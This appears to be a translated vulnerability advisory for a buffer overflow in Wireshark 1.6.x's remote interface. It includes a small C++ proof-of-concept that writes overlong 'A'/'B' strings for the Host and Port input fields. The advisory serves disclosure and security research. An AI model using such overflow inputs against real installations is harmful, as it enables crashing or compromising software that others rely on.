Wireshark Remote Interface Buffer Overflow Vulnerability
Release date:
Updated on:
Affected Systems:
Wireshark 1.6.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55211
Wireshark (formerly known as Ethereal) is network packet analysis software.
Wireshark 1.6.0, 1.8.2, and other versions have a buffer overflow vulnerability. This vulnerability allows remote attackers to execute arbitrary code in affected applications.
<* Source: X-h4ck *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
X-h4ck provides the following test method:
#include <cstdio>
#include <iostream>
// Wrote a little shit code to generate nicely for u those strings
using namespace std;
int main() {
    char buff1[] = "\x41"; // filler byte 'A'
    char buff2[] = "\x42"; // marker byte 'B'
    FILE *txtfile;
    txtfile = fopen("c:\\exploit.txt", "w");
    if (txtfile == NULL) { // stop if the output file cannot be created
        return 1;
    }
    fputs("Host Input: \n", txtfile);
    for (int i = 0; i < 659; i++) { // 659 filler bytes for the host field
        fputs(buff1, txtfile);
    }
    fputs("\n", txtfile);
    fputs("Port Input: \n", txtfile);
    for (int y = 0; y < 652; y++) { // 652 filler bytes for the port field
        fputs(buff1, txtfile);
    }
    for (int x = 0; x < 8; x++) { // followed by 8 marker bytes
        fputs(buff2, txtfile);
    }
    fclose(txtfile);
    return 0;
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Wireshark
---------
The vendor has not yet released a patch or upgrade for this issue. Users of the software should watch the vendor's security page to obtain the latest version:
http://www.wireshark.org/security/